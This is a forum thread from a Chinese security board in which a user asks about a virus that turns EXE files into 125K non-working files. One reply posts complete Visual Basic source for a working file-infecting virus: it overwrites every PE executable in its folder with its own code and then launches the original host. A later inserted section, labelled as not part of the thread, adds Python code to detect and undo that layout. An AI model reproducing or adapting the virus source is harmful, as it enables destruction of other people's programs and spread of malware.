Forum: Virus Zone  Title: After infection, EXEs all become 125K and cannot run! What virus is this??
Author: liyanyouth [liyanyouth]    Forum user
This post was moved here from << Advanced Hacking >> by [TomyChen]

After being infected, EXE files all become 125K and none of them can run? What virus is this?? How do I remove it?

Original poster  Posted: 04-05-03 14:44

Reply: drckness [drckness]   Forum user
Infection is easy! Do not misuse the code below!

Option Explicit
Private Victim As String    'holds the victim file name
Private HostLen As Long      'holds the victim file length
Private vbArray() As Byte  'holds the vbVirus code
Private hArray() As Byte    'holds the victims code
Private lenght As Long
Const MySize As Integer = 14336  'vbVirus size

Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private iResult As Long
Private hProg As Long
Private idProg As Long
Private iExit As Long
Const STILL_ACTIVE As Long = &H103
Const PROCESS_ALL_ACCESS As Long = &H1F0FFF

Private Sub Form_Initialize()
    Dim i As Long
    On Error GoTo vbVerror  'If an error show the form
                            'Error will occur if the user starts and
                            'ends the infected program to quickly
                            'other error now Write access...

    'Copy the vbVirus code to an array to write out to a new file
    'in a infect file we would only want to read in the vbVirus code
    'which is why filecopy is not used here
        Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read _
                As #1
            ReDim vbArray(MySize)
            Get #1, 1, vbArray
        Close #1
     
    'now copy the victim,into its array
    'and the append the two arrays into a file
    'overwriting the existing victim file
   
    Victim = Dir(App.Path & "\" & "*.EXE")
        While Victim <> ""
         
            If Format(Victim, ">") <> Format(App.EXEName & ".EXE", ">") Then
                Open App.Path & "\" & Victim For Binary Access Read As #1
                    ReDim hArray(LOF(1))
                    Get #1, 1, hArray
                Close #1
               
                    'To stop reinfection I make the DOS error msg say
                    ' db "Program can not run due to Murkry Poisoning.",0dh,0ah,24h
                    'I then check if the M in Murkry is there in all new files
                    'Yes this will infect any .exe including DOS files but the
                    'infected exe will fail under anything but a Win32 environment
                    'displaying the above msg
                If hArray(&H69) <> &H4D Then
                   
                    i = hArray(&H3C)
                    If hArray(i) = &H50 Then
                        Open App.Path & "\" & Victim For Binary Access Write As #1
                            Put #1, , vbArray
                            Put #1, MySize, hArray
                        Close #1
                    End If 'Make sure its a PE file
                End If  'Simple check to make sure we are not reinfecting
            End If  'check for Current file name
       
        Victim = Dir()  'Get Next victim
     
      Wend
   
  'All possible exe's have been infected by the vbVirus
  'Now we need to generate the old host and spawn off it
   
    Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #1
        lenght = LOF(1) - MySize
        If lenght <> 0 Then
            ReDim vbArray(lenght - 1)
            Get #1, MySize, vbArray
        Close #1
       
        Open App.Path & "\" & App.EXEName & ".eve" For Binary Access Write As #1
            Put #1, , vbArray
        Close #1
        'Routine to shell and wait for the host to close
        'then delete the file. If while running the host the
        'user copied that file he would have the original file back
        'so this is one way to disinfect
       
        idProg = Shell(App.Path & "\" & App.EXEName & ".eve", vbNormalFocus)
        hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg)
        GetExitCodeProcess hProg, iExit
        Do While iExit = STILL_ACTIVE
            DoEvents
            GetExitCodeProcess hProg, iExit
        Loop
        Kill App.Path & "\" & App.EXEName & ".eve"
       
    Else
        Close #1
   
    End If
   
    End
   
vbVerror:

End Sub 'End the Init routines


[This post was edited by drckness(drckness) on May 9 at 16:04]

Floor B1  Posted: 04-05-09 16:03
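
For cleanup, the layout the posted sample produces can be detected and reversed offline. The following is an added example, not part of the thread: it checks for the 'M' marker at offset 0x69 and a PE image starting at file position MySize, then returns the original host bytes. The function names and the sample bytes are constructed for illustration, and nothing in the thread confirms that the 125K infection in the question uses this layout.

```python
import struct

STUB_SIZE = 14336      # MySize constant from the posted code
MARKER_OFFSET = 0x69   # the posted code tests this byte for 'M' (0x4D)

def is_pe(image: bytes) -> bool:
    """True if image starts with MZ and e_lfanew points at a PE signature."""
    if len(image) < 0x40 or image[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    return image[e_lfanew:e_lfanew + 4] == b"PE\0\0"

def recover_host(data: bytes, stub_size: int = STUB_SIZE):
    """Return the original host bytes if data has the prepended layout, else None."""
    host_off = stub_size - 1                 # VB file positions are 1-based
    if len(data) <= max(host_off, MARKER_OFFSET) or data[:2] != b"MZ":
        return None
    if data[MARKER_OFFSET] != 0x4D:          # reinfection marker absent
        return None
    # Mirrors the sample's own arithmetic: host length = file length - MySize.
    # (The writer emits one extra trailing byte, which this drops.)
    host_len = len(data) - stub_size
    host = data[host_off:host_off + host_len]
    return host if is_pe(host) else None

def constructed_sample():
    """Build inert test bytes with the same layout (constructed, not real malware)."""
    host = bytearray(0x80)
    host[:2] = b"MZ"
    struct.pack_into("<I", host, 0x3C, 0x40)
    host[0x40:0x44] = b"PE\0\0"
    stub = bytearray(STUB_SIZE - 1)          # stub bytes that survive the overwrite
    stub[:2] = b"MZ"
    stub[MARKER_OFFSET] = 0x4D
    infected = bytes(stub) + bytes(host) + b"\0"
    return bytes(host), infected

if __name__ == "__main__":
    clean, infected = constructed_sample()
    print("infected layout detected:", recover_host(infected) == clean)
    print("clean file flagged:", recover_host(clean) is not None)
```

Run it against copies of suspect files, and compare the recovered bytes with a known-good copy or hash before putting anything back.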

Reply: zuanmolv [zuanmolv]   Forum user
It doesn't matter what virus it is, disinfect first!

Floor B2  Posted: 04-05-11 11:37

Copyright © 2000-2010 20CN Security Group. All Rights Reserved.